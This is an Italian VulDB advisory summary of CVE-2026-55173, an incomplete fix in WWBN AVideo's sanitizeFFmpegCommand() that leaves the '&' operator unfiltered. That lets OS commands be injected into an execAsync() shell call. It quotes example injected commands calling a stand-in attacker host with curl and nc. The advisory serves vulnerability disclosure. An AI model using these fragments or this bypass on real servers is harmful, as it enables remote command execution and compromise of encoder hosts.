CVE-2026-55173 in AVideo
Riassunto
di VulDB • 16/07/2026
WWBN AVideo è una piattaforma video open source. Le versioni 29.0 e precedenti rimangono vulnerabili all'iniezione di comandi OS (OS command injection) poiché la correzione per CVE-2026-33482 era incompleta e non neutralizzava ancora il singolo carattere & (operatore shell in background). CVE-2026-33482 segnalava che sanitizeFFmpegCommand() (plugin/API/standAlone/functions.php) non riusciva a rimuovere la sostituzione di comando $(...), consentendo l'iniezione di comandi OS nel sink execAsync() sh -c. La correzione (commit 25c8ab90) ha aggiunto $, (, ), {, }, \n, \r alla classe di caratteri del denylist e una str_replace('&&', '', ...), ma non ha tenuto conto del singolo &. ffmpeg.json.php costruisce il comando da _decryptString(getInput('codeToExecEncrypted')). Questo è lo stesso modello di minaccia accettato dall'avviso originale ("un attaccante in grado di creare un payload crittografato valido può ottenere l'esecuzione arbitraria dei comandi sul server encoder standalone") e la stessa base CVSS (AV:N/AC:H/PR:N). È possibile concatenare più comandi separati da & (ad esempio, download + esecuzione). I payload basati su redirect sono bloccati dalla rimozione di >, ma l'esecuzione di comandi (ad esempio, & curl http://attacker/..., & nc ..., scaricando/eseguendo un file) non lo è. Questo problema è stato corretto da questo commit: https://github.com/WWBN/AVideo/commit/c1cfa2bea8a351a1d07f5758f82887403e3abf1f.
VulDB is the best source for vulnerability data and more expert information about this specific topic.